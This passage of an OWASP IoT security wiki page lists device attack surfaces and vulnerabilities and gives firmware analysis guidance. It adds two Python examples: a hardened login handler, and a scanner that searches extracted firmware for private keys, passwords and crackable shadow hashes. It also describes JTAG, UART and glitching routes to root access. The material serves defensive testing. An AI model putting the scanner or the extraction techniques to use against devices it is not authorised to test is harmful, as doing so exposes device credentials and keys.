* Security related function API exposure<br />
* Firmware downgrade possibility<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* Blocking of device firmware OTA updates<br />
* Firmware loaded over insecure channel (no TLS)<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Check for insecure direct object references<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of the same static encryption/decryption key across devices<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Privacy'''<br />
|<br />
* User data disclosure<br />
* User/device location disclosure<br />
* Differential privacy<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damage (Physically)<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Attack Surface Areas Project? ==<br />
<br />
The IoT Attack Surface Areas Project provides a list of attack surfaces that should be understood by manufacturers, developers, security researchers, and those looking to deploy or implement IoT technologies within their organizations.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Vulnerabilities =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Vulnerabilities Project ==<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Vulnerability<br />
! Attack Surface<br />
! Summary<br />
|-<br />
| '''Username Enumeration'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to collect a set of valid usernames by interacting with the authentication mechanism<br />
|-<br />
| '''Weak Passwords'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to set account passwords to '1234' or '123456' for example.<br />
* Usage of pre-programmed default passwords<br />
|-<br />
| '''Account Lockout'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to continue sending authentication attempts after 3 - 5 failed login attempts<br />
|-<br />
| '''Unencrypted Services'''<br />
|<br />
* Device Network Services<br />
|<br />
* Network services are not properly encrypted to prevent eavesdropping or tampering by attackers<br />
|-<br />
| '''Two-factor Authentication'''<br />
|<br />
* Administrative Interface<br />
* Cloud Web Interface<br />
* Mobile Application<br />
|<br />
* Lack of two-factor authentication mechanisms such as a security token or fingerprint scanner<br />
|-<br />
| '''Poorly Implemented Encryption'''<br />
|<br />
* Device Network Services<br />
|<br />
* Encryption is implemented, but it is misconfigured or not kept up to date, e.g. using SSL v2<br />
|-<br />
| '''Update Sent Without Encryption'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Updates are transmitted over the network without using TLS or encrypting the update file itself<br />
|-<br />
| '''Update Location Writable'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Storage location for update files is world-writable, potentially allowing a modified firmware image to be distributed to all users<br />
|-<br />
| '''Denial of Service'''<br />
|<br />
* Device Network Services<br />
|<br />
* A service can be attacked in a way that denies access to that service or to the entire device<br />
|-<br />
| '''Removal of Storage Media'''<br />
|<br />
* Device Physical Interfaces<br />
|<br />
* Ability to physically remove the storage media from the device<br />
|-<br />
| '''No Manual Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to manually force an update check for the device<br />
|-<br />
| '''Missing Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to update device<br />
|-<br />
| '''Firmware Version Display and/or Last Update Date'''<br />
|<br />
* Device Firmware<br />
|<br />
* Current firmware version is not displayed and/or the last update date is not displayed<br />
|-<br />
| '''Firmware and storage extraction'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://www.flashrom.org/Flashrom In-Situ dumping]<br />
* Intercepting an OTA update<br />
* Downloading from the manufacturer's web page<br />
* [https://www.exploitee.rs/index.php/Exploitee.rs_Low_Voltage_e-MMC_Adapter eMMC tapping]<br />
* Unsoldering the SPI flash / eMMC chip and reading it in an adapter<br />
|<br />
* Firmware contains a lot of useful information: the source code and binaries of running services, pre-set passwords, SSH keys, etc.<br />
|-<br />
| '''Manipulating the code execution flow of the device'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://wiki.newae.com/Main_Page Fault injection (glitching) and side-channel attacks]<br />
|<br />
* With a JTAG/SWD adapter and gdb an attacker can halt the CPU, read and write memory and registers, and change the execution flow of the firmware, bypassing almost all software-based security controls<br />
* Fault injection (e.g. voltage or clock glitching) can likewise alter the execution flow, and side-channel analysis (e.g. power analysis) can leak secrets such as keys from the device<br />
|-<br />
| '''Obtaining console access'''<br />
|<br />
* Serial interfaces (SPI / UART)<br />
|<br />
* By connecting to a serial interface (typically UART), an attacker can often obtain a root shell or a bootloader prompt on the device<br />
* Common countermeasures include custom or locked-down bootloaders that stop the attacker from entering single-user mode, but these can often be bypassed as well<br />
|-<br />
| '''Insecure third-party components'''<br />
|<br />
* Software<br />
|<br />
* Out-of-date versions of BusyBox, OpenSSL, SSH daemons, web servers, etc., with publicly known vulnerabilities<br />
|-<br />
<br />
|}<br />
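<br />
The credential-management rows above (username enumeration, weak passwords, account lockout, known default credentials) describe failures of one login handler. The following Python example, added here and not part of the OWASP project's own material, shows a hardened handler that addresses all four at once: unknown users are verified against a decoy record so the response and the timing do not reveal whether an account exists, a factory-default password is flagged for mandatory change on first login, short or common passwords are rejected, and five consecutive failures lock the account for a window without disclosing the lock. The policy constants, the account names and the injectable clock are assumptions made for the example.<br />
<br />
```python
import hashlib
import hmac
import os
import time

# Policy constants (hypothetical values chosen for this example)
LOCKOUT_THRESHOLD = 5        # consecutive failures before the account is locked
LOCKOUT_SECONDS = 15 * 60    # how long a locked account stays locked
MIN_PASSWORD_LEN = 12
COMMON_PASSWORDS = {"1234", "123456", "12345678", "password", "admin", "root"}
PBKDF2_ROUNDS = 100_000      # kept modest so the example runs quickly


def _hash(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ROUNDS)


def make_record(password: str, must_change: bool = False) -> dict:
    """Build a credential record. must_change=True marks a factory-default
    password that has to be replaced on first login."""
    salt = os.urandom(16)
    return {"salt": salt, "hash": _hash(password, salt), "must_change": must_change,
            "failures": 0, "locked_until": 0.0}


# Decoy record: unknown usernames are verified against it so the response and the
# amount of work are the same as for a real account (no username enumeration).
_DECOY = make_record("decoy-password-never-valid")


class AuthService:
    def __init__(self, accounts: dict, clock=time.time):
        self.accounts = accounts   # username -> record
        self.clock = clock         # injectable so lockout expiry can be tested

    def password_acceptable(self, password: str) -> bool:
        """Reject short passwords and the usual factory/default choices."""
        return len(password) >= MIN_PASSWORD_LEN and password.lower() not in COMMON_PASSWORDS

    def login(self, username: str, password: str) -> str:
        """Return 'ok', 'change_password' or 'invalid'.
        Unknown user, wrong password and locked account all yield 'invalid'."""
        now = self.clock()
        rec = self.accounts.get(username, _DECOY)
        # Always do the full hash comparison, even for unknown or locked accounts.
        matches = hmac.compare_digest(_hash(password, rec["salt"]), rec["hash"])
        if rec is _DECOY or rec["locked_until"] > now:
            return "invalid"
        if not matches:
            rec["failures"] += 1
            if rec["failures"] >= LOCKOUT_THRESHOLD:
                rec["locked_until"] = now + LOCKOUT_SECONDS
                rec["failures"] = 0
            return "invalid"
        rec["failures"] = 0
        return "change_password" if rec["must_change"] else "ok"

    def change_password(self, username: str, old: str, new: str) -> bool:
        """Re-authenticate, enforce the policy, then rotate salt and hash."""
        if self.login(username, old) not in ("ok", "change_password"):
            return False
        if not self.password_acceptable(new):
            return False
        self.accounts[username] = make_record(new)
        return True


if __name__ == "__main__":
    svc = AuthService({"admin": make_record("admin", must_change=True)})
    print(svc.login("nobody", "guess"))                                     # invalid
    print(svc.login("admin", "admin"))                                      # change_password
    print(svc.change_password("admin", "admin", "123456"))                  # False
    print(svc.change_password("admin", "admin", "correct horse battery staple"))  # True
```
<br />
The lock is reported as a plain 'invalid' on purpose: a distinct "account locked" message would let an attacker confirm that a username exists, which is exactly the username-enumeration weakness in the first row of the table.<br />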
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Vulnerabilities Project? ==<br />
<br />
The IoT Vulnerabilities Project provides:<br />
<br />
* Information on the top IoT vulnerabilities<br />
* The attack surface associated with the vulnerability<br />
* A summary of the vulnerability<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Medical Devices =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Medical Device Testing ==<br />
<br />
The Medical Device Testing project is intended to provide some basic attack surface considerations that should be evaluated before shipping Medical Device equipment.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''HL7'''<br />
|<br />
* XML Parsing<br />
** XSS<br />
* Information Disclosure<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure:<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys (symmetric and asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* Blocking of device firmware OTA updates<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of the same static encryption/decryption key across devices<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (Wi-Fi, Z-Wave, XBee, Zigbee, Bluetooth, LoRa)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Data Flow'''<br />
|<br />
* What data is being captured?<br />
* How does it move within the ecosystem?<br />
* How is it protected in transit?<br />
* How is it protected at rest?<br />
* Who is that data shared with?<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damaging (Physically)<br />
* Failure state analysis<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Medical Attack Surfaces project? ==<br />
<br />
The Medical Attack Surfaces project provides:<br />
<br />
* A simple way for testers, manufacturers, developers, and users to get an understanding of the complexity of a modern medical environment<br />
* A way to visualize the numerous attack surfaces that need to be defended within medical equipment ecosystems<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Daniel Miessler presented on using Adaptive Testing Methodologies to evaluate the security of medical devices at RSA 2017.<br />
<br />
|}<br />
<br />
= Firmware Analysis =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Analysis Project ==<br />
<br />
The Firmware Analysis Project is intended to provide security testing guidance for the IoT Attack Surface "Device Firmware":<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Section<br />
! <br />
|- <br />
|<br />
Device Firmware Vulnerabilities<br />
|<br />
* Out-of-date core components<br />
* Unsupported core components<br />
* Expired and/or self-signed certificates<br />
* Same certificate used on multiple devices<br />
* Admin web interface concerns<br />
* Hardcoded or easy to guess credentials<br />
* Sensitive information disclosure<br />
* Sensitive URL disclosure<br />
* Encryption key exposure<br />
* Backdoor accounts<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
|-<br />
|<br />
Manufacturer Recommendations<br />
|<br />
* Ensure that supported and up-to-date software is used by developers<br />
* Ensure that robust update mechanisms are in place for devices<br />
* Ensure that certificates are not duplicated across devices and product lines.<br />
* Develop a mechanism to ensure a new certificate is installed when old ones expire<br />
* Disable deprecated SSL/TLS versions<br />
* Ensure developers do not code in easy to guess or common admin passwords<br />
* Ensure services such as SSH are not shipped with default or shared passwords<br />
* Develop a mechanism that requires the user to create a secure admin password during initial device setup<br />
* Ensure developers do not hard code passwords or hashes<br />
* Have source code reviewed by a third party before releasing device to production<br />
* Ensure industry-standard encryption and strong, salted password hashing are used<br />
|-<br />
|<br />
Device Firmware Guidance and Instruction<br />
|<br />
* Firmware file analysis<br />
* Firmware extraction<br />
* Dynamic binary analysis<br />
* Static binary analysis<br />
* Static code analysis<br />
* Firmware emulation<br />
* File system analysis<br />
|-<br />
|<br />
Device Firmware Tools<br />
|<br />
* [https://github.com/craigz28/firmwalker Firmwalker] <br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://github.com/angr/angr Angr binary analysis framework]<br />
* [http://binwalk.org/ Binwalk firmware analysis tool]<br />
* [http://www.binaryanalysis.org/en/home Binary Analysis Tool]<br />
* [https://github.com/firmadyne/firmadyne Firmadyne]<br />
|-<br />
|<br />
Vulnerable Firmware<br />
|<br />
* [https://github.com/praetorian-inc/DVRF Damn Vulnerable Router Firmware]<br />
|-<br />
|}<br />
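<br />
Both the "Firmware and storage extraction" row of the IoT Vulnerabilities table (firmware contains pre-set passwords, SSH keys and the binaries of running services) and the "File system analysis" step above come down to the same task: walking an extracted root filesystem, such as the output of binwalk, and pulling out the material that matters. The Python example below is an added illustration of that step in the spirit of Firmwalker; it is not code from the project or from any of the tools linked above. The directory layout, file names, placeholder shadow hashes and detection patterns are all constructed for the example.<br />
<br />
```python
import re
import stat
import tempfile
from pathlib import Path

# Content patterns worth flagging in an extracted root filesystem. Illustrative,
# not exhaustive (a real review adds vendor-specific strings and binaries of interest).
PATTERNS = {
    "private_key": re.compile(rb"-----BEGIN (?:RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----"),
    "certificate": re.compile(rb"-----BEGIN CERTIFICATE-----"),
    "password_assignment": re.compile(rb"(?i)\b(?:passw(?:or)?d|pwd|secret)\s*[=:]\s*\S+"),
    "url": re.compile(rb"https?://[^\s\"']+"),
    "aws_access_key_id": re.compile(rb"\bAKIA[0-9A-Z]{16}\b"),
}
# File names that are interesting regardless of content
SENSITIVE_NAMES = {"shadow", "passwd", "id_rsa", "id_dsa", "id_ecdsa", "id_ed25519",
                   "authorized_keys", "wpa_supplicant.conf", "hostapd.conf"}
MAX_BYTES = 4 * 1024 * 1024   # cap per-file read so a large blob does not stall the scan


def scan_rootfs(root) -> list:
    """Walk an extracted rootfs and return (relative path, finding kind, excerpt) tuples."""
    root = Path(root)
    findings = []
    for path in sorted(root.rglob("*")):
        if path.is_symlink() or not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        if path.stat().st_mode & stat.S_ISUID:
            findings.append((rel, "setuid_binary", ""))
        if path.name in SENSITIVE_NAMES:
            findings.append((rel, "sensitive_file", ""))
        data = path.read_bytes()[:MAX_BYTES]
        for kind, pattern in PATTERNS.items():
            for match in pattern.finditer(data):
                findings.append((rel, kind, match.group(0)[:60].decode("latin-1")))
    return findings


def crackable_shadow_accounts(root) -> list:
    """Return (user, hash) pairs from etc/shadow whose password field is a real hash,
    i.e. not locked ('*', '!', '!!') or empty: candidates for offline cracking and
    for spotting undocumented (backdoor) accounts."""
    shadow = Path(root) / "etc" / "shadow"
    if not shadow.is_file():
        return []
    accounts = []
    for line in shadow.read_text(errors="replace").splitlines():
        fields = line.split(":")
        if len(fields) >= 2 and fields[1] not in ("", "*", "!", "!!", "x"):
            accounts.append((fields[0], fields[1]))
    return accounts


def build_sample_rootfs() -> Path:
    """Constructed stand-in for an extracted firmware image (not from any real device)."""
    root = Path(tempfile.mkdtemp(prefix="rootfs_"))
    (root / "etc" / "ssl").mkdir(parents=True)
    (root / "usr" / "bin").mkdir(parents=True)
    (root / "etc" / "shadow").write_text(
        "root:$1$xyz$r3placeMeWithARealHash:17000:0:99999:7:::\n"
        "daemon:*:17000:0:99999:7:::\n"
        "support:$6$salt$anotherPlaceholderHash:17000:0:99999:7:::\n")
    (root / "etc" / "cloud.conf").write_text(
        "endpoint=https://api.example.invalid/v1\npassword = s3cret-cloud-token\n")
    (root / "etc" / "ssl" / "device.key").write_text(
        "-----BEGIN RSA PRIVATE KEY-----\nMIIE...(truncated)...\n-----END RSA PRIVATE KEY-----\n")
    telnetd = root / "usr" / "bin" / "telnetd"
    telnetd.write_bytes(b"\x7fELF\x01\x01\x01\x00" + b"\x00" * 8)
    telnetd.chmod(0o4755)   # setuid root inside the image
    return root


if __name__ == "__main__":
    sample = build_sample_rootfs()
    for rel, kind, excerpt in scan_rootfs(sample):
        print(f"{kind:20} {rel}  {excerpt}")
    for user, pw_hash in crackable_shadow_accounts(sample):
        print(f"shadow account with usable password hash: {user} -> {pw_hash}")
```
<br />
Usage note: point scan_rootfs() at the directory binwalk extracted (for instance the squashfs-root folder) and triage the output by kind. Every private key or usable shadow hash found in an image is shared by every device running that image, which is what makes the "Same certificate used on multiple devices" and "Hardcoded or easy to guess credentials" entries above so serious.<br />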
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Analysis Project? ==<br />
<br />
The Firmware Analysis Project provides:<br />
<br />
* Security testing guidance for vulnerabilities in the "Device Firmware" attack surface<br />
* Steps for extracting file systems from various firmware files<br />
* Guidance on searching a file system for sensitive or interesting data<br />
* Information on static analysis of firmware contents<br />
* Information on dynamic analysis of emulated services (e.g. web admin interface)<br />
* Testing tool links<br />
* A site for pulling together existing information on firmware analysis<br />
<br />
== Project Leaders ==<br />
<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Event Logging Project=<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File: OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Logging Events==<br />
<br />
This is a working draft of the recommended minimum set of events that an IoT device should log. It is meant to cover many different types of devices, including consumer IoT, enterprise IoT, and ICS/SCADA devices.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Event Category<br />
! Events<br />
|-<br />
| '''Request Exceptions'''<br />
|<br />
* Attempt to Invoke Unsupported HTTP Method<br />
* Unexpected Quantity of Characters in Parameter<br />
* Unexpected Type of Characters in Parameter<br />
|-<br />
| '''Authentication Exceptions'''<br />
|<br />
* Multiple Failed Passwords<br />
* High Rate of Login Attempts<br />
* Additional POST Variable<br />
* Deviation from Normal GEO Location<br />
|-<br />
| '''Session Exceptions'''<br />
|<br />
* Modifying the Existing Cookie<br />
* Substituting Another User's Valid SessionID or Cookie<br />
* Source Location Changes During Session<br />
|-<br />
| '''Access Control Exceptions'''<br />
|<br />
* Modifying URL Argument Within a GET for Direct Object Access Attempt<br />
* Modifying Parameter Within a POST for Direct Object Access Attempt<br />
* Forced Browsing Attempt<br />
|-<br />
| '''Ecosystem Membership Exceptions'''<br />
|<br />
* Traffic Seen from Disenrolled System<br />
* Traffic Seen from Unenrolled System<br />
* Failed Attempt to Enroll in Ecosystem<br />
* Multiple Attempts to Enroll in Ecosystem<br />
|-<br />
| '''Device Access Events'''<br />
|<br />
* Device Case Tampering Detected<br />
* Device Logic Board Tampering Detected<br />
|-<br />
| '''Administrative Mode Events'''<br />
